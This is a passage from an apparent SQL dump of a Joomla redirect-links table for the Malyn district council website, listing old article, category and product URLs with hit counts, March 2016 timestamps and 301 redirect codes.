00:00:00',301),(27047,'http://www.malyn-rayrada.org.ua/kostyli-podmyshechnye-osd-86001/','','','',5,0,'2016-03-09 16:25:59','0000-00-00 00:00:00',301),(27048,'http://www.malyn-rayrada.org.ua/kostyli-podmyshechnye-osd-86002/','','','',5,0,'2016-03-09 16:26:03','0000-00-00 00:00:00',301),(27049,'http://www.malyn-rayrada.org.ua/nakonechniki-dlya-podlokotnykh-kostyley-osd-8005/','','','',5,0,'2016-03-09 16:26:06','0000-00-00 00:00:00',301),(27050,'http://www.malyn-rayrada.org.ua/nakostylnik-rezinovyy-s-metallicheskoy-shayboy-osd-20011/','','','',5,0,'2016-03-09 16:26:09','0000-00-00 00:00:00',301),(27051,'http://www.malyn-rayrada.org.ua/payments-and-deliveries/','','','',5,0,'2016-03-09 16:26:15','0000-00-00 00:00:00',301),(27052,'http://www.malyn-rayrada.org.ua/promotions/','','','',5,0,'2016-03-09 16:26:24','0000-00-00 00:00:00',301),(27053,'http://www.malyn-rayrada.org.ua/reguliruemaya-alyuminievaya-trost-osd/','','','',5,0,'2016-03-09 16:26:31','0000-00-00 00:00:00',301),(27054,'http://www.malyn-rayrada.org.ua/rent/','','','',5,0,'2016-03-09 16:26:37','0000-00-00 00:00:00',301),(27055,'http://www.malyn-rayrada.org.ua/trost-osd-s-ruchkoy-derby/','','','',5,0,'2016-03-09 16:26:44','0000-00-00 00:00:00',301),(27056,'http://www.malyn-rayrada.org.ua/trost-s-amortizatsiey-osd/','','','',5,0,'2016-03-09 16:26:51','0000-00-00 00:00:00',301),(27057,'http://www.malyn-rayrada.org.ua/trost-skladnaya-osd/','','','',5,0,'2016-03-09 16:27:00','0000-00-00 00:00:00',301),(27058,'http://www.malyn-rayrada.org.ua/trost-teleskopicheskaya-fs-938l/','','','',5,0,'2016-03-09 16:27:07','0000-00-00 00:00:00',301),(27059,'http://www.malyn-rayrada.org.ua/trostkvadropod-osd/','','','',5,0,'2016-03-09 16:27:13','0000-00-00 00:00:00',301),(27060,'http://www.malyn-rayrada.org.ua/trostkvadropod-osd-c-bolshoy-bazoy/','','','',5,0,'2016-03-09 16:27:21','0000-00-00 00:00:00',301),(27061,'http://www.malyn-rayrada.org.ua/warranty/','','','',1,0,'2016-03-09 16:27:24','0000-00-00 00:00:00',301),(27062,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=924:2013-02-20-19-06-08&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-09 16:52:40','0000-00-00 00:00:00',301),(27063,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=588:2012-02-27-13-48-51&catid=40&Itemid=77&lang=en','','','',1,0,'2016-03-09 17:32:02','0000-00-00 00:00:00',301),(27064,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45:--14112012-&id=793:2012-10-17-06-29-27&lang=ru&option=com_content&view=article','','','',3,0,'2016-03-09 17:42:44','0000-00-00 00:00:00',301),(27065,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=671:2012-05-09-13-09-05&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-09 17:42:44','0000-00-00 00:00:00',301),(27066,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1022:-------lr---&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-09 17:42:46','0000-00-00 00:00:00',301),(27067,'http://www.malyn-rayrada.org.ua/index.php?Itemid=77&catid=40:--28032012-&id=580:-l-r-2012-2016-&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-09 17:55:56','0000-00-00 00:00:00',301),(27068,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=236:-192011-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2016-03-09 19:27:05','0000-00-00 00:00:00',301),(27069,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=731:2012-07-02-08-51-09&lang=en&option=com_content&view=article','','http://go.mail.ru/search_images','',1,0,'2016-03-09 19:54:11','0000-00-00 00:00:00',301),(27070,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=54&Itemid=95&lang=en&limitstart=5','','','',1,0,'2016-03-09 19:58:54','0000-00-00 00:00:00',301),(27071,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=174:-9-2010-&catid=11:2010-06-05-14-33-33&Itemid=16&lang=en','','','',1,0,'2016-03-09 20:33:34','0000-00-00 00:00:00',301),(27072,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1186:-------2013--------i--2014--&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-09 20:36:50','0000-00-00 00:00:00',301),(27073,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45?id=1293:-2014-&catid=58&lang=ru','','','',6,0,'2016-03-09 21:20:05','0000-00-00 00:00:00',301),(27074,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=753:2012-09-05-09-48-36&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-09 21:37:14','0000-00-00 00:00:00',301),(27075,'http://www.malyn-rayrada.org.ua/index.php?Itemid=62&id=31:-25032011&lang=uk&layout=blog&limitstart=5&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2016-03-09 21:59:20','0000-00-00 00:00:00',301),(27076,'http://www.malyn-rayrada.org.ua/index.php?Itemid=61&catid=30&id=229:-2011-&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-09 22:08:53','0000-00-00 00:00:00',301),(27077,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&id=43&lan__7bf__g=en&lang=ru&layout=blog&limitstart=20&option=com_content&view=category','','','',1,0,'2016-03-09 22:08:54','0000-00-00 00:00:00',301),(27078,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=892:2013-01-08-13-26-18&Itemid=14&lang=ru&option=com_content&view=article','','','',11,0,'2016-03-09 22:19:48','0000-00-00 00:00:00',301),(27079,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=uk&id=829:24-1600-l-r','','','',20,0,'2016-03-09 22:19:52','0000-00-00 00:00:00',301),(27080,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=791:2012-10-17-06-06-34&catid=45&Itemid=84&lang=uk','','','',13,0,'2016-03-09 22:19:55','0000-00-00 00:00:00',301),(27081,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=455:2011-11-10-13-39-05&Itemid=73&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-09 22:20:02','0000-00-00 00:00:00',301),(27082,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=en&id=892:2013-01-08-13-26-18','','','',21,0,'2016-03-09 22:20:12','0000-00-00 00:00:00',301),(27083,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38&id=464:2011-11-11-12-15-19&lang=ru&option=com_content&view=article','','','',3,0,'2016-03-09 22:34:22','0000-00-00 00:00:00',301),(27084,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&id=53:--25102013-&lang=en&layout=blog&option=com_content&view=category','','','',1,0,'2016-03-09 23:09:53','0000-00-00 00:00:00',301),(27085,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&id=51:--19072013-&lang=uk&layout=blog&limitstart=10&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2016-03-09 23:30:04','0000-00-00 00:00:00',301),(27086,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=963:2013-03-13-06-16-53&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-09 23:41:08','0000-00-00 00:00:00',301),(27087,'http://www.malyn-rayrada.org.ua/index.php?Itemid=17&catid=10&id=8:2010-06-05-15-08-15&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-09 23:41:09','0000-00-00 00:00:00',301),(27088,'http://www.malyn-rayrada.org.ua/index.php?Itemid=95&id=54:--29112013-&lang=ru&layout=blog&option=com_content&view=category','','','',2,0,'2016-03-10 00:55:25','0000-00-00 00:00:00',301),(27089,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=359:2011-06-30-11-10-42&catid=35:2011-06-30-10-56-57&Itemid=69&lang=en','','','',5,0,'2016-03-10 00:57:48','0000-00-00 00:00:00',301),(27090,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53&id=1082:-2012-2015-&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-10 04:18:35','0000-00-00 00:00:00',301),(27091,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45?id=1304:2014-04-30-09-11-23&catid=58:--30042014-&lang=en','','','',7,0,'2016-03-10 04:35:50','0000-00-00 00:00:00',301),(27092,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1059:2013-07-24-05-42-15&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-10 04:36:28','0000-00-00 00:00:00',301),(27093,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&id=33&lang=uk&layout=blog&option=com_content&view=category','','','',1,0,'2016-03-10 05:21:22','0000-00-00 00:00:00',301),(27094,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1001:2013-04-30-12-14-17&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-10 05:45:33','0000-00-00 00:00:00',301),(27095,'http://www.malyn-rayrada.org.ua/index.php?Itemid=80&catid=42:--16052012-&id=633:-2015-&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-10 05:45:33','0000-00-00 00:00:00',301),(27097,'http://www.malyn-rayrada.org.ua/index.php?Itemid=60&catid=29:--15122010-&id=210:-2010-&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-10 06:17:14','0000-00-00 00:00:00',301),(27098,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=743:2012-07-26-08-11-32&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-10 06:18:19','0000-00-00 00:00:00',301),(27099,'http://www.malyn-rayrada.org.ua/index.php?Itemid=87&catid=48&id=955:2013-03-07-06-31-04&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-10 07:30:29','0000-00-00 00:00:00',301),(27100,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38:--19122011-&id=514:2011-12-22-10-03-07&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-10 07:51:22','0000-00-00 00:00:00',301),(27101,'http://www.malyn-rayrada.org.ua/index.php?Itemid=18&catid=15:2010-06-06-09-34-01&id=863:------qq&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-10 08:26:10','0000-00-00 00:00:00',301),(27102,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=577:--------2011--&catid=39:-22022012-&Itemid=76&lang=ru','','','',9,0,'2016-03-10 08:44:32','0000-00-00 00:00:00',301),(27103,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=845:-2012-2013-&Itemid=85&lang=uk','','','',1,0,'2016-03-10 08:45:05','0000-00-00 00:00:00',301),(27104,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=889:-2013-&catid=46:--21122012&Itemid=85&lang=ru','','','',1,0,'2016-03-10 08:46:25','0000-00-00 00:00:00',301),(27105,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&id=49:--12042013-&lang=ru&layout=blog&option=com_content&view=category','','','',3,0,'2016-03-10 08:46:55','0000-00-00 00:00:00',301),(27106,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=722:2012-06-15-13-56-24&catid=43&Itemid=82&lang=ru','','','',1,0,'2016-03-10 08:47:20','0000-00-00 00:00:00',301),(27107,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=957:199-&lang=en','','','',1,0,'2016-03-10 08:47:48','0000-00-00 00:00:00',301),(27108,'http://www.malyn-rayrada.org.ua/index.php?Itemid=61&id=30:--30122010-&lang=ru&layout=blog&option=com_content&view=category','','','',1,0,'2016-03-10 09:05:39','0000-00-00 00:00:00',301),(27109,'http://malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=965:2013-03-14-10-56-03&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-10 09:18:36','0000-00-00 00:00:00',301),(27110,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/892-2013-01-08-13-26-18?Itemid=0&lang=en','','','',1,0,'2016-03-10 10:31:33','0000-00-00 00:00:00',301),(27111,'http://www.malyn-rayrada.org.ua/index.php?Itemid=78&id=41:--27042012-&lang=ru&layout=blog&option=com_content&view=category','','','',2,0,'2016-03-10 10:36:14','0000-00-00 00:00:00',301),(27112,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1212:2014-02-07-07-01-38&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-10 10:36:15','0000-00-00 00:00:00',301),(27113,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&catid=33:-20052011&id=309:----5----6--20--2011-&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-10 10:41:01','0000-00-00 00:00:00',301),(27114,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=963:2013-03-13-06-16-53&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-10 10:51:39','0000-00-00 00:00:00',301),(27115,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?id=941:2013-02-27-14-30-15&lang=ru','','http://go.mail.ru/search_images','',2,0,'2016-03-10 11:02:26','0000-00-00 00:00:00',301),(27116,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43&id=723:2012-06-18-14-29-08&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-10 11:35:38','0000-00-00 00:00:00',301),(27117,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38&id=514:2011-12-22-10-03-07&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-10 12:26:20','0000-00-00 00:00:00',301),(27118,'http://www.malyn-rayrada.org.ua/index.php/743-do-vidoma-zhiteliv-mista-ta-rajonu_3/','','http://go.mail.ru/search_images','',2,0,'2016-03-10 12:36:21','0000-00-00 00:00:00',301),(27119,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=890:2013-01-06-09-42-40&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-10 12:38:38','0000-00-00 00:00:00',301),(27120,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=827:2012-11-20-17-44-21&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-10 13:12:45','0000-00-00 00:00:00',301),(27121,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&id=10:2013-02-22-07-29-10&lang=en&option=com_poll','','','',2,0,'2016-03-10 13:48:25','0000-00-00 00:00:00',301),(27122,'http://www.malyn-rayrada.org.ua/index.php?Itemid=85&id=46:--21122012&lang=ru&layout=blog&option=com_content&view=category','','','',2,0,'2016-03-10 14:44:52','0000-00-00 00:00:00',301),(27123,'http://www.malyn-rayrada.org.ua/index.php?Itemid=72&catid=37:--21102011-&id=412:-165-&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-10 16:30:49','0000-00-00 00:00:00',301),(27124,'http://malyn-rayrada.org.ua/index.php?catid=16:2010-06-06-10-55-25&id=277:-2010-&itemid=39&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-10 17:08:39','0000-00-00 00:00:00',301),(27125,'http://www.malyn-rayrada.org.ua/index.php?Itemid=72&id=37:--21102011-&lang=uk&layout=blog&limitstart=15&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2016-03-10 17:13:09','0000-00-00 00:00:00',301),(27126,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-05-12-54-02?id=1351:-2014-&catid=59:--20062014-&lang=en','','','',1,0,'2016-03-10 18:10:49','0000-00-00 00:00:00',301),(27127,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=747:2012-08-03-09-21-28&lang=en&option=com_content&view=article','','','',2,0,'2016-03-10 18:14:58','0000-00-00 00:00:00',301),(27128,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=808:2012-10-30-13-56-37&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-10 18:14:59','0000-00-00 00:00:00',301),(27129,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&id=38:--19122011-&lang=uk&layout=blog&limitstart=15&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2016-03-10 18:18:08','0000-00-00 00:00:00',301),(27130,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=613:2012-03-26-14-13-34&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-10 18:24:29','0000-00-00 00:00:00',301),(27131,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38:--19122011-&id=452:-20-2011-100-l-r-&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-10 18:24:30','0000-00-00 00:00:00',301),(27132,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1220:2014-02-21-15-56-19&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-10 18:24:32','0000-00-00 00:00:00',301),(27133,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=609:-q-q&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-10 18:24:33','0000-00-00 00:00:00',301),(27134,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=866:2012-12-14-06-58-01&lang=ru&option=com_content&view=article','','','',4,0,'2016-03-10 18:46:12','0000-00-00 00:00:00',301),(27135,'http://malyn-rayrada.org.ua/index.php?Itemid=82&catid=43:--25072012-&id=724:-27042012252&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-10 19:35:06','0000-00-00 00:00:00',301),(27136,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&id=43:--25072012-&lang=uk&layout=blog&limitstart=30&option=com_content&view=category','','','',1,0,'2016-03-10 19:40:58','0000-00-00 00:00:00',301),(27138,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43&id=702:-2011-2013-&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-10 21:31:51','0000-00-00 00:00:00',301),(27139,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1094:2013-09-24-05-02-52&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-10 21:32:26','0000-00-00 00:00:00',301),(27140,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=890:2014-01-06-08-19-15&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-10 21:32:28','0000-00-00 00:00:00',301),(27141,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43&id=736:2012-07-18-13-34-35&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-10 21:50:25','0000-00-00 00:00:00',301),(27142,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1214:2014-02-18-09-51-45&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-10 21:53:27','0000-00-00 00:00:00',301),(27143,'http://www.malyn-rayrada.org.ua/index.php?catid=48:--11032013-&id=955:2013-03-07-06-31-04&Itemid=87&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-10 22:37:07','0000-00-00 00:00:00',301),(27144,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=10:2010-06-05-15-11-20&catid=8&Itemid=13&lang=en','','','',2,0,'2016-03-10 22:56:41','0000-00-00 00:00:00',301),(27145,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=en&id=890:2014-01-06-08-19-15','','','',1,0,'2016-03-10 22:58:05','0000-00-00 00:00:00',301),(27146,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1130:2013-11-07-14-04-12&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-10 22:59:13','0000-00-00 00:00:00',301),(27147,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=563:-30012012185-12&catid=39:-22022012-&Itemid=76&lang=uk','','','',1,0,'2016-03-10 23:05:18','0000-00-00 00:00:00',301),(27148,'http://www.malyn-rayrada.org.ua/index.php?catid=47:-21022013-&id=905:-2012-2015-&Itemid=86&lang=en&option=com_content&view=article','','','',1,0,'2016-03-10 23:16:12','0000-00-00 00:00:00',301),(27149,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=uk&id=687:2012-05-24-11-21-04','','','',1,0,'2016-03-10 23:16:17','0000-00-00 00:00:00',301),(27150,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=957:199-&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-10 23:16:28','0000-00-00 00:00:00',301),(27151,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=464:2011-11-11-12-15-19&catid=38&Itemid=73&lang=ru','','','',1,0,'2016-03-10 23:16:36','0000-00-00 00:00:00',301),(27152,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=en&id=1004:2013-05-04-11-41-00','','','',1,0,'2016-03-10 23:16:40','0000-00-00 00:00:00',301),(27153,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=218:2010-12-21-06-45-54&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-11 00:04:49','0000-00-00 00:00:00',301),(27154,'http://www.malyn-rayrada.org.ua/index.php?Itemid=68&id=34&lang=uk&layout=blog&option=com_content&view=category','','','',1,0,'2016-03-11 00:59:36','0000-00-00 00:00:00',301),(27155,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&catid=39:-22022012-&id=552:2012-01-26-12-47-12&lang=uk&option=com_content&view=article','','','',3,0,'2016-03-11 00:59:37','0000-00-00 00:00:00',301),(27156,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=734:-6-2012-&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-11 04:56:24','0000-00-00 00:00:00',301),(27157,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38:--19122011-&id=525:2011-12-30-10-19-27&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-11 05:00:34','0000-00-00 00:00:00',301),(27158,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&catid=33:-20052011&id=318:-2007-2011&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-11 05:02:05','0000-00-00 00:00:00',301),(27159,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-?start=15','','','',2,0,'2016-03-11 05:47:17','0000-00-00 00:00:00',301),(27160,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=1221:2014-02-22-08-09-27&Itemid=&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-11 05:51:09','0000-00-00 00:00:00',301),(27161,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1102:2013-10-03-08-08-33&Itemid=14&lang=ru&option=com_content&view=article','','','',13,0,'2016-03-11 06:01:06','0000-00-00 00:00:00',301),(27162,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=434:2011-10-21-15-10-36&catid=37&Itemid=72&lang=en','','','',15,0,'2016-03-11 06:01:14','0000-00-00 00:00:00',301),(27163,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=718:2012-06-14-15-24-50&catid=43:--25072012-&Itemid=82&lang=uk','','','',14,0,'2016-03-11 06:01:18','0000-00-00 00:00:00',301),(27164,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=729:-l20-r&Itemid=14&lang=en&option=com_content&view=article','','','',11,0,'2016-03-11 06:01:22','0000-00-00 00:00:00',301),(27165,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1102:2013-10-03-08-08-33&Itemid=0&lang=ru&option=com_content&view=article','','','',4,0,'2016-03-11 06:01:27','0000-00-00 00:00:00',301),(27166,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=990:-2013-&Itemid=14&lang=en&option=com_content&view=article','','','',11,0,'2016-03-11 06:02:01','0000-00-00 00:00:00',301),(27167,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1015:-200-&Itemid=0&lang=en&option=com_content&view=article','','','',4,0,'2016-03-11 06:02:15','0000-00-00 00:00:00',301),(27168,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=892:2013-01-08-13-26-18&Itemid=14&lang=en&option=com_content&view=article','','','',6,0,'2016-03-11 06:02:18','0000-00-00 00:00:00',301),(27169,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=279:2011-03-31-08-20-23&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-11 06:35:20','0000-00-00 00:00:00',301),(27170,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=609:-q-q&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-11 06:40:03','0000-00-00 00:00:00',301),(27171,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38:--19122011-&id=520:-2012-2013-&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-11 08:10:48','0000-00-00 00:00:00',301),(27172,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1140:80-1932-33-l-r&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-11 08:14:15','0000-00-00 00:00:00',301),(27173,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=730:2012-07-02-05-04-18&catid=11&lang=uk&Itemid=','','','',4,0,'2016-03-11 08:14:18','0000-00-00 00:00:00',301),(27174,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=659:-2011-&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-11 09:41:38','0000-00-00 00:00:00',301),(27175,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1153:-2013-&lang=en&option=com_content&view=article','','','',2,0,'2016-03-11 09:47:13','0000-00-00 00:00:00',301),(27176,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1012:l-r&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-11 09:49:23','0000-00-00 00:00:00',301),(27177,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=898:-14-112012332-l-r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',10,0,'2016-03-11 11:13:39','0000-00-00 00:00:00',301),(27178,'http://www.malyn-rayrada.org.ua/index.php?Itemid=107&id=59:--20062014-&lang=uk&layout=blog&option=com_content&view=category','','','',3,0,'2016-03-11 11:19:05','0000-00-00 00:00:00',301),(27179,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47:-21022013-&id=932:-l90-r&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-11 12:47:14','0000-00-00 00:00:00',301),(27180,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=620:2012-03-29-10-03-40&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-11 13:01:42','0000-00-00 00:00:00',301),(27181,'http://www.malyn-rayrada.org.ua/index.php?Itemid=12&catid=7&id=9:2010-06-05-15-10-04&lang=en&option=com_content&view=article','','','',3,0,'2016-03-11 14:17:54','0000-00-00 00:00:00',301),(27182,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49&id=987:2013-04-15-06-06-41&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-11 14:17:56','0000-00-00 00:00:00',301),(27183,'http://www.malyn-rayrada.org.ua/index.php?Itemid=64&catid=32:2011-03-31-12-03-04&id=641:2012-04-03-12-52-00&lang=uk&option=com_content&view=article','','','',4,0,'2016-03-11 15:52:47','0000-00-00 00:00:00',301),(27184,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49&id=985:2013-04-12-09-53-08&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-11 19:03:12','0000-00-00 00:00:00',301),(27185,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1095:2013-09-24-13-25-55&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-11 19:22:53','0000-00-00 00:00:00',301),(27186,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-49-27/pochesni-gromadyani-rajonu-10-10','','','',9,0,'2016-03-11 22:00:30','0000-00-00 00:00:00',301),(27187,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=530:-4050-vi-l-r-1-2013-&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-11 22:09:05','0000-00-00 00:00:00',301),(27188,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45&id=818:2012-11-14-16-37-52&lang=en&option=com_content&view=article','','','',2,0,'2016-03-11 22:17:53','0000-00-00 00:00:00',301),(27189,'http://www.malyn-rayrada.org.ua/index.php?catid=37&id=413:-2011-2012-&Itemid=72&lang=ru&option=com_content&view=article','','','',6,0,'2016-03-11 22:37:45','0000-00-00 00:00:00',301),(27190,'http://www.malyn-rayrada.org.ua/index.php?catid=39:-22022012-&id=565:2012-02-03-09-48-29&Itemid=76&lang=uk&option=com_content&view=article','','','',6,0,'2016-03-11 22:37:55','0000-00-00 